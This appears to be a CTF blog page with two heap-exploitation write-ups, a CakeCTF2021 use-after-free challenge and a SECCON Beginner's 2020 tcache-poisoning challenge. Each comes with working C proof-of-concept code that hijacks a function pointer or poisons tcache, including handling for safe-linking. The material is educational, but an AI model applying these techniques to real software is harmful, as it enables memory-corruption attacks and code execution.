uaf4b - CakeCTF2021

Plan: overwrite the function pointer with system() via Use After Free. About the COWSAY struct: in a freed chunk, fn_dialogue overlaps fd and message overlaps bk. typedef struct { void (*fn_dialogue)(char*); char *message; } COWSAY; Also pay attention to the call cowsay->fn_dialogue(cowsay->message); at L167~171 of main.c: case 1: /* Use cowsay */ printf("[+] You're trying to call 0x%016lx\n", (addr)cowsay->fn_dialogue); cowsay->fn_dialogue(cowsay->message); break; Malloced chunk: when it is malloced, the heap area is as follows....
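The dangling-pointer reuse the plan relies on, as an added example that is not part of the writeup or the challenge source: a COWSAY is freed but still used, a same-size allocation gets the same 0x20 chunk back from tcache, and whatever the attacker writes into the first 16 bytes becomes fn_dialogue and message. It assumes glibc (tcache is LIFO for equal sizes); the names uaf_hijack_demo, fake_system and last_call are mine, and fake_system stands in for system() so the redirected call can be checked instead of spawning a shell.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same layout as the challenge's COWSAY: two pointers, 16 bytes of user
 * data, so malloc() hands out a 0x20 chunk. Once the chunk is freed into
 * tcache, its first 8 bytes hold the tcache "next" link (fd) and the next
 * 8 the tcache key (bk), which is why fn_dialogue and message overlap them. */
typedef struct {
    void (*fn_dialogue)(char *);
    char *message;
} COWSAY;

static char last_call[32];            /* records what the hijacked call received */

static void say(char *msg) { printf("cow says: %s\n", msg); }

/* Stand-in for system() (assumption for this demo): the real exploit points
 * fn_dialogue at system and message at "/bin/sh"; here we only record it. */
static void fake_system(char *cmd) { snprintf(last_call, sizeof last_call, "%s", cmd); }

/* Returns 1 when the freed chunk was reused and the call was redirected,
 * 0 when the allocator handed back a different chunk (i.e. not glibc). */
int uaf_hijack_demo(void)
{
    COWSAY *cowsay = malloc(sizeof *cowsay);
    cowsay->fn_dialogue = say;
    cowsay->message = "moo";
    cowsay->fn_dialogue(cowsay->message);

    free(cowsay);                      /* bug: the pointer is kept and used below */

    /* A same-size allocation: tcache is LIFO, so glibc returns exactly the
     * chunk that cowsay still points at. */
    uintptr_t *attacker = malloc(sizeof *cowsay);
    if ((void *)attacker != (void *)cowsay) {
        free(attacker);
        return 0;
    }

    /* Bytes 0..7 of the new buffer are cowsay->fn_dialogue, bytes 8..15 are
     * cowsay->message: the attacker's data fully controls both fields. */
    static char cmd[] = "/bin/sh";
    attacker[0] = (uintptr_t)fake_system;
    attacker[1] = (uintptr_t)cmd;

    /* The "Use cowsay" path from main.c, now calling the attacker's target. */
    printf("[+] You're trying to call 0x%016lx\n", (unsigned long)cowsay->fn_dialogue);
    cowsay->fn_dialogue(cowsay->message);

    free(attacker);
    return strcmp(last_call, "/bin/sh") == 0;
}

int main(void)
{
    return uaf_hijack_demo() ? 0 : 1;
}
```

In the challenge the second allocation is whatever same-size buffer the program lets you fill; the only thing that matters is that the 0x20 chunk comes back from tcache before the stale cowsay pointer is used again.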

2022-05-10 · 1 min · Me

Beginner's Heap - SECCON Beginner's CTF 2020

Plan: overwrite the next chunk's (B's) fd pointer by heap overflow, then call the win function via tcache poisoning. Preparation: after the mallocs, the freed region of B is linked into tcache:
-=-=-=-=-= TCACHE -=-=-=-=-=
[ tcache (for 0x20) ]
||
\/
[ 0x000055dfd3002350(rw-) ]
||
\/
[ END OF TCACHE ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vulnerability: heap overflow. You can write 0x80 bytes into a chunk of size 0x18. Overwrite B's fd pointer: right now no other freed chunk is linked after B, because the freed chunk's fd is NULL....
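The tcache poisoning step end to end, as an added example that is not part of the writeup or the challenge binary: three adjacent 0x20 chunks, B freed into tcache, an overflow from A that runs through B's size field into B's fd, and two mallocs of which the second returns the attacker's address. It assumes glibc; it detects at runtime whether the fd link is stored raw (glibc before 2.32) or mangled with safe-linking (next ^ (&next >> 12), glibc 2.32 and later) and frees two chunks first so the bin's count is not zero, which newer glibc checks. The names tcache_poison_demo, victim and win are mine, and a volatile byte loop stands in for the program's oversized read().

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int win_hit = 0;
static void win(void) { win_hit = 1; }

/* The attacker's target: an object whose first field is a function pointer.
 * 16-byte alignment matters, since newer glibc aborts on an unaligned
 * tcache chunk. tcache_get() reads the first 8 bytes as the "next" link and
 * zeroes the next 8 (the key) when it hands the fake chunk out. */
_Alignas(16) static struct {
    void (*fn)(void);
    uintptr_t key;
    unsigned char rest[16];
} victim = { NULL, 0, {0} };

/* Returns 1 when the poisoned tcache made malloc() return &victim and the
 * overwritten pointer was called; 0 when the heap did not behave like glibc's. */
int tcache_poison_demo(void)
{
    /* Three 0x20 chunks laid out back to back, as A and B are in the challenge. */
    unsigned char *A = malloc(0x18);
    unsigned char *B = malloc(0x18);
    unsigned char *C = malloc(0x18);
    if (B != A + 0x20 || C != B + 0x20)
        return 0;                       /* not adjacent: different allocator */

    /* Two frees so the 0x20 bin's count is 2: glibc 2.30+ will not take
     * from a bin whose count is 0 even if the list is non-empty. */
    free(C);
    free(B);                            /* tcache: B -> C */

    /* Detect safe-linking from what free() actually stored in B's fd. */
    uintptr_t stored = *(uintptr_t *)B;
    uintptr_t fake_fd;
    if (stored == (uintptr_t)C)
        fake_fd = (uintptr_t)&victim;
    else if (stored == ((uintptr_t)C ^ ((uintptr_t)B >> 12)))
        fake_fd = (uintptr_t)&victim ^ ((uintptr_t)B >> 12);
    else
        return 0;

    /* The overflow: 0x28 bytes from A cover A's 0x18 bytes of data, B's
     * size field (kept at 0x21 so nothing looks corrupted) and B's fd. */
    unsigned char payload[0x28];
    uint64_t size = 0x21;
    memset(payload, 'A', 0x18);
    memcpy(payload + 0x18, &size, sizeof size);
    memcpy(payload + 0x20, &fake_fd, sizeof fake_fd);
    volatile unsigned char *p = A;      /* in the challenge this is the oversized read() */
    for (int i = 0; i < 0x28; i++)
        p[i] = payload[i];

    /* First malloc returns B, second returns the poisoned address. */
    void *first  = malloc(0x18);
    void *second = malloc(0x18);
    if (first != B || second != (void *)&victim)
        return 0;

    /* The attacker's write into "their" buffer is a write into victim. */
    *(void (**)(void))second = win;
    victim.fn();                        /* the program's call now reaches win */

    free(first);
    free(A);                            /* never free second: it is not a heap chunk */
    return win_hit;
}

int main(void)
{
    printf("tcache poisoning %s\n", tcache_poison_demo() ? "worked" : "did not apply");
    return 0;
}
```

Two checks worth keeping in mind from this: the bin count has to survive the number of mallocs you need (hence freeing two chunks), and with safe-linking the poisoned fd must be mangled with the address of the chunk it sits in, so a heap leak is required on glibc 2.32 and later.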

2022-05-06 · 2 min · Me